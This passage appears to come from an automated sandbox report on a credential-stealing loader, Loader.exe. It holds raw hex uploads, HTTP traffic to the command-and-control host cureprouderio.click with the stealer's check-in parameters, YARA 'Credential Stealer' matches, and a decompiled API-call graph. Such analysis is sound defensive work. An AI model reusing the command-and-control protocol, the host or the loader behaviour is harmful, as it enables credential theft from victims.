                                                                                                Data Ascii: Z7`v3FTSV}94\{F8 Ph~$R,04nJV0|[`:0w<K8gaVjXF}e9m<8euE'.%;C8u\`[wI{CN+n>_L xE;K$l :A*0-Y_oH%2
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: e5 e1 68 36 11 4c d0 62 1e 59 85 cd 36 19 ca cb 0f 11 af 88 34 ee 13 48 dc 13 9a 5d 73 96 25 c8 6b 7b 64 44 c6 10 7c 54 b3 6f fe f9 b3 13 51 fe d6 04 e2 a8 77 91 9a 9d b8 76 eb 98 5d 46 8c 94 06 ff 0f 98 19 84 a8 70 e3 20 46 a1 8e 1b e2 7d 2d 0d a7 2e 22 7a d7 8f 22 f1 f6 77 83 99 af a9 6d 16 e2 0e f7 a8 b2 8c 0d ed bd af 55 46 6c b9 4e 5a 92 31 e2 5e ef 9c f8 4b 2e 0f 48 76 6c 9c 94 da fb 52 4b 23 cc 59 83 d9 f9 ee 10 c2 15 8e 37 54 ed 22 55 63 e4 0a 2f a0 90 20 fd b6 28 6d 31 50 dc 69 9f d6 7d 8e 17 83 64 e3 38 41 8e 46 c1 fe a1 23 ca de 8d 10 5a cb 36 3e 43 40 fb 7f 16 eb ff ff 65 82 07 6c 4c 43 92 38 41 fa bc 20 3e 10 dc 82 6b b3 73 ce 85 91 74 b6 4c 8c 21 48 71 72 d0 a5 2b 69 03 6c fb 15 da 84 02 f0 59 85 45 9e 4f 6c 3f 87 c7 f7 42 24 d2 15 93 53 5f
                                                                                                Data Ascii: h6LbY64H]s%k{dD|ToQwv]Fp F}-."z"wmUFlNZ1^K.HvlRK#Y7T"Uc/ (m1Pi}d8AF#Z6>C@elLC8A >kstL!Hqr+ilYEOl?B$S_
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: a1 f4 47 09 db c6 6f 77 89 3e 20 f1 a3 b3 07 57 22 83 70 ef 34 0b 4f 90 02 4e a1 78 ca 8f 3e 4c 6d 2a 7c be af 47 0d 38 25 03 7a 20 c3 f5 3f 16 69 43 f6 fa b7 8a 05 b3 05 af a1 3d 7d b2 55 2b 2d e3 93 73 76 0b 55 9f 8e 6f b7 7f d7 12 de 39 d5 13 28 00 31 db f7 e8 db 03 8a de 8d 1a 81 d5 e7 2f 41 61 96 cd c8 82 a5 00 be c7 07 e4 24 17 a4 bc af 19 44 d1 3f e2 7d 5d c4 9e cc 98 38 1b d3 9f 45 c2 67 85 6a 44 81 f6 90 08 25 71 4b fc 3b ea a7 c7 d0 f5 19 9f 6c 0b fa 47 d1 e4 36 07 b3 7d fb 88 ef de a0 92 f9 4f 9c 88 24 61 91 4a dc e3 d1 af 01 11 15 33 02 d6 7b cb 7c 0e 36 e4 2a 27 80 31 99 4a 0f 5e 7c 02 59 f4 00 63 1b 31 a3 cc 22 de cf b2 48 15 b8 46 85 2c 5a 65 9c 18 be 6f 54 38 91 bb bf 9d 31 3b 4b 8a a5 c6 83 03 27 15 af 1f fd a2 20 ce 23 94 3d 4f 6a a0 ea
                                                                                                Data Ascii: Gow> W"p4ONx>Lm*|G8%z ?iC=}U+-svUo9(1/Aa$D?}]8EgjD%qK;lG6}O$aJ3{|6*'1J^|Yc1"HF,ZeoT81;K' #=Oj
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: b6 cb 0d 1f 3d 77 60 06 55 2f 4d 7e 91 30 f2 26 df 24 6c 57 11 80 b0 2a 47 62 f8 4f 26 ed 06 0e 93 d9 82 b5 d2 c2 77 54 ac 36 bc ff 29 8c 8e a5 fa 53 79 c4 47 f5 29 0a 64 19 be 13 da 63 49 47 5c cd 82 02 e6 77 92 fb f7 6c 35 3a eb c1 bd 89 42 e1 60 c9 3e e1 47 b0 e7 d3 78 26 27 dd f0 6f 28 42 68 fb 75 22 dd 59 0f 40 5c a1 2f dc e5 be 77 9c 91 14 5a aa 06 28 bc dd 7f 5d 0a f4 84 ef cc 3b df f4 e4 03 e8 79 5a b7 0c 72 29 ef ee be 9e ff 79 7f f9 c8 1d 99 97 b9 f9 e5 ca b7 19 91 b8 5b 10 63 a5 95 a4 50 c5 9c af f8 bf 93 82 ec 5e 3a 46 9c 17 02 6f d3 f3 fb c7 65 23 15 25 e3 8f d7 87 23 a4 25 42 71 f3 02 d8 64 db 40 19 30 b9 60 6b 89 2b e4 e0 4b 7f 5b 4a 50 ab f5 dc 65 38 6b 94 61 16 b7 1b 5f be d0 6c 81 90 3e e7 91 a7 f0 27 da c2 31 00 7f d9 39 8f 54 81 86 07
                                                                                                Data Ascii: =w`U/M~0&$lW*GbO&wT6)SyG)dcIG\wl5:B`>Gx&'o(Bhu"Y@\/wZ(];yZr)y[cP^:Foe#%#%Bqd@0`k+K[JPe8ka_l>'19T
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: 05 52 de 3b a5 c2 90 7f cf 68 2d 7c 54 e7 fd d7 77 d5 bb ea 95 6e 38 8f d3 87 87 55 46 98 69 ff cc a7 e8 57 2e ce ea 6c 65 d0 f0 f0 02 e7 d7 d2 80 43 ef 01 43 5c ec 7f 21 a3 96 1b b8 66 c6 f4 2c db 9f b2 d6 6e 37 3e 7c 8f 9d 6e 46 43 8a d5 eb a9 a1 aa 4e 93 ee 5c c5 9d 36 dd 6f 90 b2 79 c7 6e 82 c4 6c 0d f8 f2 6a 4f 68 0d f7 53 7a cb fb 73 b6 2b dd 0f 2f dc 6f 7a 63 7d 7e 74 ac a2 93 db b2 c4 2a 3a 67 d7 aa b1 1e 9f 66 3e ea 77 71 91 81 e1 f6 be eb 5d 71 1f 68 bd fe 14 4e 9c 62 16 2d 30 60 c6 c2 aa 61 93 1c f5 55 4c 88 75 bc 16 30 9d 7b 05 82 33 5a aa 0f 87 36 b8 cc 3d 99 c9 ca 36 a8 0a c8 47 96 2b 6f fa 7e b8 75 8e e7 5b df fd d1 97 e9 9c c7 e9 dd cb 64 7f 7d e6 f0 6b 8c c9 1e f0 f6 c1 9d 31 2f 3f a7 3f c8 1d 19 0e 7d ca 36 3a 95 fb 39 63 d9 9a 98 7e 50
                                                                                                Data Ascii: R;h-|Twn8UFiW.leCC\!f,n7>|nFCN\6oynljOhSzs+/ozc}~t*:gf>wq]qhNb-0`aULu0{3Z6=6G+o~u[d}k1/??}6:9c~P
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: 94 c2 94 7c a4 1b 0e c4 8a f2 02 e4 c0 fa cd 23 9d ad 2d 8e 26 33 2f a5 4a 84 e0 4f 82 21 5d dd 7f f7 8d 51 8e 81 74 09 32 da 5b bd ca bb 43 1b 14 3f 70 c9 b5 bd 02 02 a6 41 bd 29 8d 57 b0 55 31 c2 04 0d bf 9d 00 af d6 b6 60 4b 35 a1 ab bf 8f 0d c8 08 bd ba 82 da d4 43 02 35 aa f6 e2 f0 bf 5a 1c f5 85 b1 60 54 a8 2d b2 91 38 71 19 ca a4 be 42 01 a9 a5 c5 d4 7c 62 39 c2 ff 0a c1 95 00 ab 39 4e 30 1d b6 92 73 e3 74 19 1b 57 5d e3 fc 51 7d fe 5f eb 68 60 fd 00 f3 48 d3 e9 2e ce b9 93 ed 8b 8d 0d 2e 33 d8 93 f6 39 cb 7c bc e4 44 d1 b4 98 d7 37 f0 69 f8 71 04 61 ed 5e 30 1c 8f f4 ec 78 cc 78 5d 9b 28 32 31 f1 c4 28 62 80 e1 8e bd fd 31 5c 01 7d 05 95 bc cc 3f a0 32 3b 46 93 82 ba 9e 4b 24 ac 4b ad f9 08 65 5e 88 e5 84 b3 fc ed a0 4f 62 f6 12 d6 2d 9b 75 c7 6b
                                                                                                Data Ascii: |#-&3/JO!]Qt2[C?pA)WU1`K5C5Z`T-8qB|b99N0stW]Q}_h`H..39|D7iqa^0xx](21(b1\}?2;FK$Ke^Ob-uk
                                                                                                2024-12-28 03:14:13 UTC15331OUTData Raw: be 9b 28 4a 4b 6c cb df bf 23 f9 92 d0 de dd 42 bc 0a a4 8a 0f 6b e3 96 66 17 bd be b8 b0 9a 82 a3 a8 03 bb 39 2e 20 2c 89 7c 5e 28 9d 78 50 41 23 27 d8 6d 97 c8 f1 d5 00 be c5 c7 d1 b0 d8 90 f3 c6 fd 1f 4e 21 b3 d2 a8 f9 93 38 db ea f9 63 d5 67 d6 ee 89 de 95 a8 76 ec 38 78 a5 b3 ae a0 48 60 f0 eb e0 23 83 e2 84 5a e6 c3 5e 53 32 56 4c 2d d0 b5 7b b2 9c 19 f2 6e ac fa f8 9b 5e 82 93 dc fd 27 a9 73 db 65 0d a4 4f f3 4c 9e 36 ad 2f 51 41 65 af 7c dd 5e 33 e3 ce a9 7c 72 6a 63 ba f3 4d ca d2 7f 09 a9 0b bd b3 97 5f 4e 26 a9 05 fd 68 bd f4 ae 37 c0 e9 ef 24 bb a5 f1 f8 92 77 79 91 77 a5 64 a4 e7 9e f2 41 a3 93 ec 51 b9 ca c9 40 a3 0c a3 8a ba d7 9b 4f 67 39 8b e4 9b 3f ac 83 32 48 39 e7 86 06 5e b4 3b 2f 4e 92 9b df 85 0c f3 e4 ae 77 a5 c5 bd 49 fd 45 fd f5
                                                                                                Data Ascii: (JKl#Bkf9. ,|^(xPA#'mN!8cgv8xH`#Z^S2VL-{n^'seOL6/QAe|^3|rjcM_N&h7$wywdAQ@Og9?2H9^;/NwIE
                                                                                                2024-12-28 03:14:16 UTC1134INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:14:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=204fhe7j5oqd2uvo0p9cjg0lrm; expires=Tue, 22 Apr 2025 21:00:54 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axRR3A5TadX8T6b9J%2BDivXLkUJHeOOFsgzkaFN6HNE2Fe7PXUlvCtSAF6FRppfmyghy18dzo4SEwit1PPgr%2BoLJBmh5%2BwZ8ie0RiR77yNyA9lYHOXokI1vtElNfe8WoVZhwmGl4p"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e61057e3942e7-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4135&min_rtt=2426&rtt_var=2131&sent=318&recv=610&lost=0&retrans=0&sent_bytes=2850&recv_bytes=588231&delivery_rate=1203627&cwnd=241&unsent_bytes=0&cid=9da44662ae1cd849&ts=2376&x=0"


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.549718172.67.132.74435396C:\Users\user\Desktop\Loader.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-12-28 03:14:17 UTC267OUTPOST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 89
                                                                                                Host: cureprouderio.click
                                                                                                2024-12-28 03:14:17 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 68 75 62 63 70 76 6b 65 61 69 64 7a 26 6a 3d 26 68 77 69 64 3d 46 41 44 37 33 30 41 45 43 43 30 31 31 43 41 33 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37
                                                                                                Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--hubcpvkeaidz&j=&hwid=FAD730AECC011CA38246926E533C64D7
                                                                                                2024-12-28 03:14:18 UTC1121INHTTP/1.1 200 OK
                                                                                                Date: Sat, 28 Dec 2024 03:14:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=d1h87adcvjkcp12ad5cc8biuun; expires=Tue, 22 Apr 2025 21:00:56 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D15izNpFvUglqpCLgngoB%2BZYrhEQS4mBx1VtvdJFz3PX6F4z1h8WJKzcpLqzlfgT312DE3frfL3m9avkNhAR8UYITgV7MpAxCy6tE911rPy1wijdnIuE8SAbJYe6H8xOi7UQW9N9"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8f8e611ceecf8c48-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1828&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2851&recv_bytes=992&delivery_rate=1582655&cwnd=215&unsent_bytes=0&cid=910000e8bdf2fa9b&ts=762&x=0"
                                                                                                2024-12-28 03:14:18 UTC54INData Raw: 33 30 0d 0a 35 45 43 6b 4b 52 73 5a 6a 42 78 79 34 46 50 31 63 4c 76 35 39 67 76 58 6e 44 52 43 2f 56 44 62 76 78 55 63 68 74 54 78 57 34 57 2f 48 51 3d 3d 0d 0a
                                                                                                Data Ascii: 305ECkKRsZjBxy4FP1cLv59gvXnDRC/VDbvxUchtTxW4W/HQ==
                                                                                                2024-12-28 03:14:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Click to jump to process

                                                                                                Click to jump to process

                                                                                                Click to dive into process behavior distribution

                                                                                                Click to jump to process

                                                                                                Target ID:0
                                                                                                Start time:22:13:55
                                                                                                Start date:27/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0xa60000
                                                                                                File size:572'456 bytes
                                                                                                MD5 hash:89C77BCE077F8E9DA11C4D6A6C496DB1
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:22:13:55
                                                                                                Start date:27/12/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:22:13:56
                                                                                                Start date:27/12/2024
                                                                                                Path:C:\Users\user\Desktop\Loader.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0xa60000
                                                                                                File size:572'456 bytes
                                                                                                MD5 hash:89C77BCE077F8E9DA11C4D6A6C496DB1
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:6.4%
                                                                                                  Dynamic/Decrypted Code Coverage:1%
                                                                                                  Signature Coverage:3.7%
                                                                                                  Total number of Nodes:801
                                                                                                  Total number of Limit Nodes:24
                                                                                                  execution_graph 20112 a792d7 20115 a7bed7 20112->20115 20116 a7bee2 RtlFreeHeap 20115->20116 20120 a792ef 20115->20120 20117 a7bef7 GetLastError 20116->20117 20116->20120 20118 a7bf04 __dosmaperr 20117->20118 20121 a776e4 14 API calls __dosmaperr 20118->20121 20121->20120 20122 a70312 20123 a7031e ___scrt_is_nonwritable_in_current_image 20122->20123 20148 a6a8ca 20123->20148 20125 a70325 20126 a7047e 20125->20126 20136 a7034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20125->20136 20190 a6f8e9 4 API calls 2 library calls 20126->20190 20128 a70485 20183 a75545 20128->20183 20132 a70493 20133 a7036e 20134 a703ef 20159 a77abc 20134->20159 20136->20133 20136->20134 20186 a7558f 39 API calls 3 library calls 20136->20186 20138 a703f5 20163 a624b0 GetConsoleWindow ShowWindow 20138->20163 20142 a70416 20142->20128 20143 a7041a 20142->20143 20144 a70423 20143->20144 20188 a75571 21 API calls CallUnexpected 20143->20188 20189 a6a903 75 API calls ___scrt_uninitialize_crt 20144->20189 20147 a7042c 20147->20133 20149 a6a8d3 20148->20149 20192 a6f555 IsProcessorFeaturePresent 20149->20192 20151 a6a8df 20193 a70cc8 10 API calls 2 library calls 20151->20193 20153 a6a8e4 20158 a6a8e8 20153->20158 20194 a73230 20153->20194 20156 a6a8ff 20156->20125 20158->20125 20160 a77ac5 20159->20160 20161 a77aca 20159->20161 20207 a77be5 59 API calls 20160->20207 20161->20138 20208 a6a663 20163->20208 20167 a62513 20168 a62554 20167->20168 20169 a6251d 20167->20169 20235 a6b317 30 API calls 2 library calls 20168->20235 20171 a62524 GetCurrentThreadId 20169->20171 20172 a6256c 20169->20172 20174 a6257d 20171->20174 20175 a6252d 20171->20175 20236 a6b317 30 API calls 2 library calls 20172->20236 20237 a6b317 30 API calls 2 library calls 20174->20237 20234 a6f11d WaitForSingleObjectEx GetExitCodeThread CloseHandle 20175->20234 20178 a6258e 20238 a6b317 30 API calls 2 library calls 20178->20238 20179 a6253a 20179->20178 20180 a62541 20179->20180 20187 a6f896 GetModuleHandleW 20180->20187 20386 a75690 20183->20386 20186->20134 20187->20142 20188->20144 20189->20147 20190->20128 20191 a7555b 21 API calls CallUnexpected 20191->20132 20192->20151 20193->20153 20198 a7e2e9 20194->20198 20197 a70ce7 7 API calls 2 library calls 20197->20158 20199 a7e2f9 20198->20199 20200 a6a8f1 20198->20200 20199->20200 20202 a7da52 20199->20202 20200->20156 20200->20197 20204 a7da59 20202->20204 20203 a7da9c GetStdHandle 20203->20204 20204->20203 20205 a7dafe 20204->20205 20206 a7daaf GetFileType 20204->20206 20205->20199 20206->20204 20207->20161 20210 a6a668 _Yarn 20208->20210 20209 a624f3 20219 a75349 20209->20219 20210->20209 20212 a6a684 20210->20212 20239 a75877 EnterCriticalSection LeaveCriticalSection codecvt 20210->20239 20213 a6f338 codecvt 20212->20213 20214 a6a68e Concurrency::cancel_current_task 20212->20214 20241 a7060c RaiseException 20213->20241 20240 a7060c RaiseException 20214->20240 20216 a6f354 20218 a6b4ce 20220 a75356 20219->20220 20221 a7536a 20219->20221 20251 a776e4 14 API calls __dosmaperr 20220->20251 20242 a753da 20221->20242 20224 a7535b 20252 a77dcf 29 API calls __strnicoll 20224->20252 20227 a7537f CreateThread 20229 a7539e GetLastError 20227->20229 20230 a753aa 20227->20230 20273 a75470 20227->20273 20228 a75366 20228->20167 20253 a7770a 14 API calls __dosmaperr 20229->20253 20254 a7542a 20230->20254 20234->20179 20239->20210 20240->20218 20241->20216 20262 a7d2b4 20242->20262 20245 a7bed7 ___free_lconv_mon 14 API calls 20246 a753f8 20245->20246 20247 a753ff GetModuleHandleExW 20246->20247 20248 a7541c 20246->20248 20247->20248 20249 a7542a 16 API calls 20248->20249 20250 a75376 20249->20250 20250->20227 20250->20230 20251->20224 20252->20228 20253->20230 20255 a75436 20254->20255 20261 a753b5 20254->20261 20256 a75445 20255->20256 20257 a7543c CloseHandle 20255->20257 20258 a75454 20256->20258 20259 a7544b FreeLibrary 20256->20259 20257->20256 20260 a7bed7 ___free_lconv_mon 14 API calls 20258->20260 20259->20258 20260->20261 20261->20167 20263 a7d2c1 20262->20263 20264 a7d301 20263->20264 20265 a7d2ec HeapAlloc 20263->20265 20269 a7d2d5 __Getctype 20263->20269 20272 a776e4 14 API calls __dosmaperr 20264->20272 20266 a7d2ff 20265->20266 20265->20269 20268 a753eb 20266->20268 20268->20245 20269->20264 20269->20265 20271 a75877 EnterCriticalSection LeaveCriticalSection codecvt 20269->20271 20271->20269 20272->20268 20274 a7547c ___scrt_is_nonwritable_in_current_image 20273->20274 20275 a75483 GetLastError ExitThread 20274->20275 20276 a75490 20274->20276 20287 a7c16a GetLastError 20276->20287 20281 a754ac 20318 a753cc 20281->20318 20288 a7c180 20287->20288 20292 a7c186 20287->20292 20322 a7cb94 6 API calls __Getctype 20288->20322 20291 a7c1a2 20294 a7d2b4 __Getctype 14 API calls 20291->20294 20311 a7c18a SetLastError 20291->20311 20292->20311 20323 a7cbd3 6 API calls __Getctype 20292->20323 20295 a7c1b7 20294->20295 20298 a7c1d0 20295->20298 20299 a7c1bf 20295->20299 20296 a7c21f 20328 a78353 39 API calls CallUnexpected 20296->20328 20297 a75495 20314 a7f767 20297->20314 20325 a7cbd3 6 API calls __Getctype 20298->20325 20324 a7cbd3 6 API calls __Getctype 20299->20324 20304 a7c1cd 20310 a7bed7 ___free_lconv_mon 14 API calls 20304->20310 20305 a7c1dc 20306 a7c1f7 20305->20306 20307 a7c1e0 20305->20307 20327 a7c47c 14 API calls __Getctype 20306->20327 20326 a7cbd3 6 API calls __Getctype 20307->20326 20310->20311 20311->20296 20311->20297 20312 a7c202 20313 a7bed7 ___free_lconv_mon 14 API calls 20312->20313 20313->20311 20315 a754a0 20314->20315 20316 a7f777 CallUnexpected 20314->20316 20315->20281 20321 a7cde0 5 API calls __Getctype 20315->20321 20316->20315 20329 a7ce89 20316->20329 20347 a754ee 20318->20347 20320 a753d9 20321->20281 20322->20292 20323->20291 20324->20304 20325->20305 20326->20304 20327->20312 20332 a7cfd6 20329->20332 20333 a7d006 20332->20333 20334 a7cea5 20332->20334 20333->20334 20339 a7cf0b 20333->20339 20334->20315 20337 a7d020 GetProcAddress 20337->20334 20338 a7d030 __Getctype 20337->20338 20338->20334 20345 a7cf1c ___vcrt_FlsFree 20339->20345 20340 a7cfb2 20340->20334 20340->20337 20341 a7cf3a LoadLibraryExW 20342 a7cf55 GetLastError 20341->20342 20343 a7cfb9 20341->20343 20342->20345 20343->20340 20344 a7cfcb FreeLibrary 20343->20344 20344->20340 20345->20340 20345->20341 20346 a7cf88 LoadLibraryExW 20345->20346 20346->20343 20346->20345 20356 a7c2bb GetLastError 20347->20356 20349 a7553b ExitThread 20350 a75512 20353 a75525 20350->20353 20354 a7551e CloseHandle 20350->20354 20351 a754f9 20351->20349 20351->20350 20379 a7ce1b 5 API calls __Getctype 20351->20379 20353->20349 20355 a75531 FreeLibraryAndExitThread 20353->20355 20354->20353 20355->20349 20357 a7c2d1 20356->20357 20361 a7c2d7 20356->20361 20380 a7cb94 6 API calls __Getctype 20357->20380 20360 a7c2f3 20363 a7d2b4 __Getctype 12 API calls 20360->20363 20376 a7c2db SetLastError 20360->20376 20361->20376 20381 a7cbd3 6 API calls __Getctype 20361->20381 20364 a7c308 20363->20364 20365 a7c321 20364->20365 20366 a7c310 20364->20366 20383 a7cbd3 6 API calls __Getctype 20365->20383 20382 a7cbd3 6 API calls __Getctype 20366->20382 20369 a7c31e 20375 a7bed7 ___free_lconv_mon 12 API calls 20369->20375 20370 a7c32d 20371 a7c331 20370->20371 20372 a7c348 20370->20372 20384 a7cbd3 6 API calls __Getctype 20371->20384 20385 a7c47c 14 API calls __Getctype 20372->20385 20375->20376 20376->20351 20377 a7c353 20378 a7bed7 ___free_lconv_mon 12 API calls 20377->20378 20378->20376 20379->20350 20380->20361 20381->20360 20382->20369 20383->20370 20384->20369 20385->20377 20387 a756cf 20386->20387 20388 a756bd 20386->20388 20398 a7582a 20387->20398 20413 a6f896 GetModuleHandleW 20388->20413 20392 a756c2 20392->20387 20414 a755c4 GetModuleHandleExW 20392->20414 20393 a7048b 20393->20191 20397 a75721 20399 a75836 ___scrt_is_nonwritable_in_current_image 20398->20399 20420 a780e1 EnterCriticalSection 20399->20420 20401 a75840 20421 a75727 20401->20421 20403 a7584d 20425 a7586b 20403->20425 20406 a7565f 20430 a75646 20406->20430 20408 a75669 20409 a7567d 20408->20409 20410 a7566d GetCurrentProcess TerminateProcess 20408->20410 20411 a755c4 CallUnexpected 3 API calls 20409->20411 20410->20409 20412 a75685 ExitProcess 20411->20412 20413->20392 20415 a75624 20414->20415 20416 a75603 GetProcAddress 20414->20416 20418 a75633 20415->20418 20419 a7562a FreeLibrary 20415->20419 20416->20415 20417 a75617 20416->20417 20417->20415 20418->20387 20419->20418 20420->20401 20422 a75733 ___scrt_is_nonwritable_in_current_image CallUnexpected 20421->20422 20423 a75797 CallUnexpected 20422->20423 20428 a773fe 14 API calls 3 library calls 20422->20428 20423->20403 20429 a780f8 LeaveCriticalSection 20425->20429 20427 a75706 20427->20393 20427->20406 20428->20423 20429->20427 20433 a7f740 5 API calls CallUnexpected 20430->20433 20432 a7564b CallUnexpected 20432->20408 20433->20432 20434 a698f0 20435 a6990f 20434->20435 20437 a698f9 20434->20437 20448 a6b57d RaiseException Concurrency::cancel_current_task 20435->20448 20441 a62270 GetModuleHandleA GetModuleFileNameW 20437->20441 20449 a7a89a 20441->20449 20443 a622b0 20453 a61fb0 GetPEB 20443->20453 20447 a622ca 20450 a7a8ad _Fputc 20449->20450 20483 a7a90f 20450->20483 20452 a7a8bf _Fputc 20452->20443 20514 a61240 20453->20514 20457 a62041 GetFileSize 20459 a62055 20457->20459 20460 a621fc CloseHandle 20457->20460 20458 a62225 20476 a6a6e1 20458->20476 20461 a6205d ReadFile 20459->20461 20460->20458 20462 a621f3 20461->20462 20463 a62079 CloseHandle 20461->20463 20462->20460 20464 a62205 20463->20464 20469 a62090 _AnonymousOriginator codecvt _strlen 20463->20469 20526 a61ef0 20464->20526 20466 a6223b 20545 a62600 30 API calls std::_Throw_Cpp_error 20466->20545 20468 a62247 20546 a77ddf 29 API calls 2 library calls 20468->20546 20469->20464 20469->20466 20469->20468 20471 a6a663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20469->20471 20539 a61000 20469->20539 20471->20469 20477 a6a6ea IsProcessorFeaturePresent 20476->20477 20478 a6a6e9 20476->20478 20480 a6f447 20477->20480 20478->20447 20899 a6f52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20480->20899 20482 a6f52a 20482->20447 20484 a7a93f 20483->20484 20485 a7a94e 20484->20485 20486 a7a96c 20484->20486 20497 a7a943 20484->20497 20507 a77f78 29 API calls 2 library calls 20485->20507 20488 a7a979 20486->20488 20508 a73790 39 API calls _Fputc 20486->20508 20491 a7a993 20488->20491 20492 a7a9b1 20488->20492 20489 a6a6e1 _ValidateLocalCookies 5 API calls 20493 a7abb4 20489->20493 20509 a866fb 5 API calls 3 library calls 20491->20509 20495 a7a9c5 20492->20495 20496 a7ab41 20492->20496 20493->20452 20495->20497 20499 a7aa5f 20495->20499 20503 a7aa09 20495->20503 20496->20497 20513 a7c021 WideCharToMultiByte _Fputc 20496->20513 20497->20489 20511 a7c021 WideCharToMultiByte _Fputc 20499->20511 20501 a7aa72 20501->20497 20504 a7aa8b GetLastError 20501->20504 20510 a7c021 WideCharToMultiByte _Fputc 20503->20510 20504->20497 20505 a7aa9a 20504->20505 20505->20497 20512 a7c021 WideCharToMultiByte _Fputc 20505->20512 20507->20497 20508->20488 20509->20497 20510->20497 20511->20501 20512->20505 20513->20497 20524 a61283 _AnonymousOriginator codecvt _strlen 20514->20524 20525 a61402 CreateFileA 20514->20525 20515 a61422 20547 a62600 30 API calls std::_Throw_Cpp_error 20515->20547 20517 a6142e 20548 a77ddf 29 API calls 2 library calls 20517->20548 20519 a6a663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 20519->20524 20521 a61000 102 API calls 20521->20524 20524->20515 20524->20517 20524->20519 20524->20521 20524->20525 20525->20457 20525->20458 20527 a61240 102 API calls 20526->20527 20528 a61f18 FreeConsole 20527->20528 20549 a614b0 20528->20549 20530 a61f39 20531 a614b0 103 API calls 20530->20531 20532 a61f4a 20531->20532 20533 a61240 102 API calls 20532->20533 20534 a61f5d VirtualProtect 20533->20534 20536 a61f7e 20534->20536 20537 a6a6e1 _ValidateLocalCookies 5 